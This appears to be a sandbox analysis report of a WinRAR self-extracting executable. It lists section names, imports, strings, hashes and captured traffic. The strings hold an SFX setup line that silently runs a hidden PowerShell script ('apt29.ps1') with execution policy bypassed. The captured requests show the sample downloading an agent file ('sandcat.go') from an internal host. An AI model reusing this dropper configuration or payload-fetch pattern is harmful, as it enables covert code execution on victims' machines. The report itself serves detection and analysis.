.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.cfguard
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.didat$2
.didat$3
.didat$4
.didat$6
.didat$7
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.didat$5
.rsrc$01
.rsrc$02
ShowWindow
GetDlgItem
EnableWindow
SetWindowTextW
GetParent
SetWindowPos
SetDlgItemTextW
GetSystemMetrics
GetClientRect
GetWindowRect
GetWindowLongW
SetWindowLongW
SetProcessDefaultLayout
GetWindow
LoadStringW
OemToCharBuffA
CharUpperW
DefWindowProcW
RegisterClassExW
CreateWindowExW
IsWindow
DestroyWindow
UpdateWindow
MapWindowPoints
CopyRect
LoadCursorW
SendMessageW
ReleaseDC
MessageBoxW
FindWindowExW
GetClassNameW
wvsprintfW
GetMessageW
TranslateMessage
DispatchMessageW
PeekMessageW
PostMessageW
WaitForInputIdle
IsWindowVisible
DialogBoxParamW
EndDialog
GetDlgItemTextW
SendDlgItemMessageW
SetFocus
SetForegroundWindow
GetSysColor
LoadBitmapW
LoadIconW
DestroyIcon
IsDialogMessageW
CreateCompatibleBitmap
CreateCompatibleDC
DeleteDC
DeleteObject
GetDeviceCaps
SelectObject
StretchBlt
CreateDIBSection
GetObjectW
GetOpenFileNameW
GetSaveFileNameW
CommDlgExtendedError
OpenProcessToken
AdjustTokenPrivileges
SetFileSecurityW
LookupPrivilegeValueW
AllocateAndInitializeSid
FreeSid
CheckTokenMembership
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
SHGetMalloc
SHGetPathFromIDListW
SHBrowseForFolderW
SHFileOperationW
ShellExecuteExW
SHGetFileInfoW
SHGetFolderLocation
SHChangeNotify
CreateStreamOnHGlobal
CoCreateInstance
CLSIDFromString
OleInitialize
OleUninitialize
SHAutoComplete
InitCommonControlsEx
sfxrar.exe
GetLastError
SetLastError
FormatMessageW
GetCurrentProcess
DeviceIoControl
SetFileTime
CloseHandle
CreateDirectoryW
RemoveDirectoryW
CreateFileW
DeleteFileW
CreateHardLinkW
GetShortPathNameW
GetLongPathNameW
MoveFileW
GetFileType
GetStdHandle
WriteFile
ReadFile
FlushFileBuffers
SetEndOfFile
SetFilePointer
SetFileAttributesW
GetFileAttributesW
FindClose
FindFirstFileW
FindNextFileW
GetVersionExW
GetCurrentDirectoryW
GetFullPathNameW
FoldStringW
GetModuleFileNameW
GetModuleHandleW
FindResourceW
FreeLibrary
GetProcAddress
GetCurrentProcessId
ExitProcess
SetThreadExecutionState
LoadLibraryW
GetSystemDirectoryW
CompareStringW
AllocConsole
FreeConsole
AttachConsole
WriteConsoleW
GetProcessAffinityMask
CreateThread
SetThreadPriority
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
SetEvent
ResetEvent
ReleaseSemaphore
WaitForSingleObject
CreateEventW
CreateSemaphoreW
GetSystemTime
SystemTimeToTzSpecificLocalTime
TzSpecificLocalTimeToSystemTime
SystemTimeToFileTime
FileTimeToLocalFileTime
LocalFileTimeToFileTime
FileTimeToSystemTime
GetCPInfo
IsDBCSLeadByte
MultiByteToWideChar
WideCharToMultiByte
GlobalAlloc
LockResource
GlobalLock
GlobalUnlock
GlobalFree
LoadResource
SizeofResource
SetCurrentDirectoryW
GetExitCodeProcess
GetLocalTime
GetTickCount
MapViewOfFile
UnmapViewOfFile
CreateFileMappingW
OpenFileMappingW
GetCommandLineW
SetEnvironmentVariableW
ExpandEnvironmentStringsW
GetTempPathW
MoveFileExW
GetLocaleInfoW
GetTimeFormatW
GetDateFormatW
GetNumberFormatW
KERNEL32.dll
GdipAlloc
GdipFree
GdipCloneImage
GdipDisposeImage
GdipCreateBitmapFromStream
GdipCreateBitmapFromStreamICM
GdipCreateHBITMAPFromBitmap
GdiplusStartup
GdiplusShutdown
gdiplus.dll
RaiseException
GetSystemInfo
VirtualProtect
VirtualQuery
LoadLibraryExA
IsProcessorFeaturePresent
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
TerminateProcess
RtlUnwind
EncodePointer
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
LoadLibraryExW
QueryPerformanceFrequency
GetModuleHandleExW
GetModuleFileNameA
GetACP
HeapFree
HeapAlloc
HeapReAlloc
GetStringTypeW
LCMapStringW
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCommandLineA
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
HeapSize
GetConsoleCP
GetConsoleMode
SetFilePointerEx
DecodePointer
(08@P`p
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AW4RAR_EXIT@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
vuOuefweV$y
d{a?b\l
c_qQ_}
'_c?!k
-[jE>y,
xT28FX
401pQm
o1CpQm0
3z.g-]`
,\`2E&X
om\^\p
SYc61r
u_Agr,
6y3&T.
Gv&F~2
QM~2^~
)'/<4t
rP?=~)
82<;W7"
F4Gcu
\szv~e
ldR4k%
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="*"
name="WinRAR SFX"
type="win32"/>
<description>WinRAR SFX module</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"/>
</dependentAssembly>
</dependency>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
0!0+0A0V0a0q0{0
2%2-2P2
3!3A3Q3`3g3q3
=1>%?1?
!0)1c1
4M4z4\5
>1?e?l?{?
(060;0R0W0
0+1=1`>
3!424B4n4
<%<4<B<
90:8:}:
:+;^;k;
>)>J>a>
>?M?c?u?
7Z8|9M:
::<\<t<y<
5;6I6k6
9 :;:J:d:\;
6P7h7i:
0Y1d1{1
2'3A3J3[3
=%=.=N=k=q=
=V>]>d>k>r>y>
?R?w?~?
0%0,030:0A0H0g0n0u0|0
3&3?3F3X3b3
4(4I4P4a4n4
5"555B5T5f5u5
9)989G9
:8;A;L;q;|;
0"0<0D0O0V0p0y0
1&1.161>1F1N1V1^1f1n1v1~1
2%202;2F2Q2\2g2r2}2
343P3b3
324G4p4
4W5r5|5
6S6]6m6
7"7.7:7
8)858G8T8u8|8
9":4:E:U:e:
00#0'0+0/03070;0?0C0G0K0O0S0W0[0_0c0g0k0o0s0w0{0
7>9U9[9h9
8"8)80878I8o8
0/1F1a1|1
6#6,6;6X6u6|6
6O7\7v7
9+9>9Q9d9
9+:G:]:r:
:7;Y;a;g;|;
<6<N<g<z<
?5???E?g?
1#171K1n1{1
2"2)252^2h2
3'343F3V3
4-4:4A4O4[4d4
8.8V8a8
809H9S9v9P:
=(=I=O=p=
?&?.?D?W?e?o?u?
2"2(2;2B2Q2]2i2u2
3%3:3C3d3}3
4)444;4H4N4[4d4m4x4
5!53585M5V5l5
6!606;6E6N6\6g6s6|6
7'747g7{7
8#9D9Z9p9
;(;J;X;^;
;c<k<w<
?2?O?h?|?
0&0d0x0
171@1I1
2)292G2r2}2
2#3(333?3U3w3
5%5+5:5C5M5s5
8)9-9195999=9A9E9I9M9Q9U9Y9]9
: :+:0:9:?:O:i:
;);];j;s;
<2<F<o<v<
> >/>K>Y>`>f>q>z>
??&?-?@?I?R?h?s?
0=0Z0j0~0
1R1X1q1
2 2*20252;2A2O2V2\2
3,3<3I3_3
4@4S4f4t4
5!5P5l5r5y5
6"6-666B6H6M6X6^6g6t6~6
7!7+757?7I7S7]7g7q7{7
8%8/898C8M8W8a8k8u8
9&909:9D9N9X9b9o9}9
:':5:?:I:S:]:g:q:{:
; ;';0;6;<;E;L;r;
;A<G<U<d<j<q<z<
=5=F=S=l=
=?>i>t>
?1?7?L?
050B0P0]0l0r0x0~0
9C9T9Y9^9
;9;N;a;~;
< =)=6=A=J=]=
=<>[>e>v>
?3???N?W?d?
0#0S0X0
1$10191>1D1N1X1h1x1
1`243G3e3s3!5X5_5d5h5l5p5
J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
99$9(9,909
?*?0?K?s?
?1?M?m?{?
030;0e0
1 1D1P1U1Z1~1
2(2M2_2k2u2
64<=<E<C=U=w=
6#6-62676<6A7
090T0_0
4.4@4[4
5%5+515
?(?6?B?U?
0)020y0
0E1R1c1m1s1
2A2J2p3v3
636E6u6
6:7T7n7
8,9I:e:
=+>2>g>x>
?"?1?;?a?r?
:+:::H:T:`:n:~:
;$;:;N;V;a;w;
152N2{2
2*3:3Q3Y3
4&404L4W4\4a4|4
5+555Q5\5a5f5
56;6F6K6P6n6
7&7M7_7k7
="=3=8=M=
1&111H1x1
626A6e6
8#808=8T8
;K;Z;h;
=-=?=Q=c=u=
>&>8>q?
7!7X7_7
8%808@8r8
;(;3;@;R;
;7<L<U<^<v<
232P2r2
4/595c5
6e7{7$8W8
0:0B0_0o0{0
282U2i2t2
5[5\6l6}6
7"7(717s7
;!=[>v>
5F6K6]6{6
;0;B;W;
<1<V<k<
<Q=f=x=
=>1>C>M>j>
`2h2l2p2t2x2|2
5,8084888<8@8D8
h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4h6l6p6t6
4$5(50585D5H5L5P5T5X5\5`5d5
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8x?
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6p>t>x>|>
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
:$:,:4:<:D:L:T:\:
; ;8;H;L;\;`;h;
<,<0<@<D<H<P<h<
1(1L1l1t1|1
2 2,2L2X2|2
343<3D3P3p3x3
484@4L4l4x4
5$5,545<5D5P5p5|5
6 6,6P6p6x6
6,7<7L7T7d7p7x7
848@8x8
9 949P9X9\9x9
:4:8:@:H:P:T:\:p:
;8;X;x;
<8<X<x<
= =@=`=
0X1d1p1|1
2$202<2H2T2`2l2x2
3 3,383D3P3\3h3t3
4(444@4L4X4d4p4|4
5$505<5H5T5`5l5x5
6 6$6(6,6064686<6@6D6H6L6X7
8@=P=T=X=\=`=d=h=l=p=t=
> >8>`>
0 0$0(0,040<0@0D0L0P0T0X0\0`0d0h0l0t0x0|0
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1p1t1x1|1
CMTPath=%temp%
Overwrite=1
Silent=1
SavePath
Setup=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -WindowStyle Hidden -noprofile -executionpolicy bypass -file %temp%\apt29.ps1
apt29.ps1
6e33/u^
KeRJc =
..:C$x}
#M>rfC
Maximum allowed array size (%u) is exceeded
SeSecurityPrivilege
SeRestorePrivilege
SeCreateSymbolicLinkPrivilege
rtmp%d
?*<>|"
*messages***
STRINGS
DIALOG
DIRECTION
s$%s:%s
CAPTION
Crypt32.dll
CryptProtectMemory failed
CryptUnprotectMemory failed
kernel32
version.dll
DXGIDebug.dll
sfc_os.dll
SSPICLI.DLL
rsaenh.dll
UXTheme.dll
dwmapi.dll
cryptbase.dll
lpk.dll
usp10.dll
clbcatq.dll
comres.dll
ws2_32.dll
ws2help.dll
psapi.dll
ieframe.dll
ntshrui.dll
atl.dll
setupapi.dll
apphelp.dll
userenv.dll
netapi32.dll
shdocvw.dll
crypt32.dll
msasn1.dll
cryptui.dll
wintrust.dll
shell32.dll
secur32.dll
cabinet.dll
oleaccrc.dll
ntmarta.dll
profapi.dll
WindowsCodecs.dll
srvcli.dll
cscapi.dll
slc.dll
imageres.dll
dnsapi.DLL
iphlpapi.DLL
WINNSI.DLL
netutils.dll
mpr.dll
devrtl.dll
propsys.dll
mlang.dll
samcli.dll
samlib.dll
wkscli.dll
dfscli.dll
browcli.dll
rasadhlp.dll
dhcpcsvc6.dll
dhcpcsvc.dll
XmlLite.dll
linkinfo.dll
cryptsp.dll
RpcRtRemote.dll
aclui.dll
dsrole.dll
peerdist.dll
uxtheme.dll
Please remove %s from %s folder. It is unsecure to run %s until it is done.
CreateThread failed
WaitForMultipleObjects error %d, GetLastError %d
Thread pool initialization failed.
%s: %s
ARarHtmlClassName
Shell.Explorer
about:blank
<html>
<head><meta http-equiv="content-type" content="text/html; charset=
utf-8"></head>
</html>
<style>
</style>
<style>body{font-family:"Arial";font-size:12;}</style>
 
riched20.dll
RarSFX
STATIC
REPLACEFILEDLG
RENAMEDLG
%s %s %s
GETPASSWORD1
ASKNEXTVOL
winrarsfxmappingfile.tmp
sfxname
%4d-%02d-%02d-%02d-%02d-%02d-%03d
sfxstime
STARTDLG
sfxcmd
sfxpar
LICENSEDLG
__tmp_rar_sfx_access_check_%u
-el -s2 "-d%s" "-sp%s"
Delete
Silent
Overwrite
TempMode
License
Presetup
Shortcut
SavePath
Update
SetupCode
%s.%d.tmp
Software\Microsoft\Windows\CurrentVersion
ProgramFilesDir
%s%s%u
Install
Software\WinRAR SFX
KERNEL32.DLL
Cadvapi32
<pi-ms-win-core-fibers-l1-1-1
<pi-ms-win-core-synch-l1-2-0
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
(
((((( H
Capi-ms-win-appmodel-runtime-l1-1-1
<pi-ms-win-core-datetime-l1-1-1
<pi-ms-win-core-file-l2-1-1
<pi-ms-win-core-localization-l1-2-1
<pi-ms-win-core-localization-obsolete-l1-2-0
<pi-ms-win-core-processthreads-l1-1-2
<pi-ms-win-core-string-l1-1-0
<pi-ms-win-core-sysinfo-l1-2-1
<pi-ms-win-core-winrt-l1-1-0
<pi-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-kernel32-package-current-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
user32
Cja-JP
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
ASKNEXTVOL
GETPASSWORD1
LICENSEDLG
RENAMEDLG
REPLACEFILEDLG
STARTDLG
Next volume is required
MS Shell Dlg 2
You need to have the following volume to continue extraction:
&Browse...
Insert a disk with this volume and press "OK" to try again or press "Cancel" to break extraction
Cancel
Enter password
MS Shell Dlg 2
&Enter password for the encrypted file:
Cancel
License
MS Shell Dlg 2
Accept
Decline
Rename
MS Shell Dlg 2
Cancel
Rename file
Confirm file replace
MS Shell Dlg 2
The following file already exists
Would you like to replace the existing file
with this one?
Yes to &All
&Rename
No to A&ll
&Cancel
WinRAR self-extracting archive
MS Shell Dlg 2
&Destination folder
Bro&wse...
hRichEdit20W
Installation progress
jmsctls_progress32
Install
Cancel
Select destination folder
Extracting %s
Skipping %s
Unexpected end of archiveThe file "%s" header is corrupt
Corrupt header is found
Main archive header is corrupt
%The archive comment header is corrupt
The archive comment is corrupt
Not enough memory
Unknown method in %s
Cannot open %s
Cannot create %s
Cannot create folder %sHChecksum error in the encrypted file %s. Corrupt file or wrong password.
Checksum error in %s Packed data checksum error in %s
Write error in the file %s
Read error in the file %s
File close error
The required volume is absent
2The archive is either in unknown format or damaged
Extracting from %s
Next volume
The archive header is corrupt
ErroraErrors encountered while performing the operation
Look at the information window for more details
modified on
folder is not accessible
lSome files could not be created.
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
All files
E<ul><li>Press <b>Install</b> button to start extraction.</li><br><br>E<ul><li>Press <b>Extract</b> button to start extraction.</li><br><br>6<li>Use <b>Browse</b> button to select the destination4folder from the folders tree. It can be also entered
manually.</li><br><br>8<li>If the destination folder does not exist, it will be
2created automatically before extraction.</li></ul>
The archive is corrupt
Extracting files to %s folder$Extracting files to temporary folder
Extract
Extraction progress
=Total path and file name length must not exceed %d characters
Unknown encryption method in %s$The specified password is incorrect.
Incorrect password for %s
Cannot copy %s to %s.
Cannot create symbolic link %s
Cannot create hard link %s(You need to unpack the link target first
AYou may need to run this self-extracting archive as administrator
Continue
Security warningKPlease remove %s from folder %s. It is unsecure to run %s until it is done.

Network

HTTP Requests

http://10.0.1.51:8888/file/download

GET /file/download HTTP/1.1
platform: windows
file: sandcat.go
Host: 10.0.1.51:8888
Connection: Keep-Alive

http://10.0.1.51:8888/file/download

GET /file/download HTTP/1.1
platform: windows
file: sandcat.go
Host: 10.0.1.51:8888
Connection: Keep-Alive

File

Type: PE32 executable (GUI) Intel 80386, for MS Windows
CRC32: E7214269
MD5: f96afb5d0bce13582a106dbaef0cd8b6
SHA1: 7ae7f09c7520a7e7ec6e52b5009d21dc425f6fc8
SHA256: d590e543b70f2a94028931c414108c2282af7de162659d3978460b0adf3765a7
SHA512: 31d24e9c95e0e2c2fc91c0db4a9109850fc3d958c7a2daeb8ec014704091c010d0f303528dd5cbfff4a5eb6c90aaf1b120e8bac7a26a0dc50026103121e237b4
Ssdeep: 6144:pdRVzSkGTxSLD8uq5CaOPs47bhqUdaD5Sd9fkq:phqxSLo5C1Ps4XhwDc98q
PEiD: None matched

Classification

Indicators

Yara

MITRE ATT&CK®

Enterprise Matrix (Tactics and Techniques)

Static Analysis

Sections

Resources

Imports

Library KERNEL32.dll:

Library gdiplus.dll:

Strings

Network

HTTP Requests

http://10.0.1.51:8888/file/download

http://10.0.1.51:8888/file/download

File

Screenshots

MITRE ATT&CK^®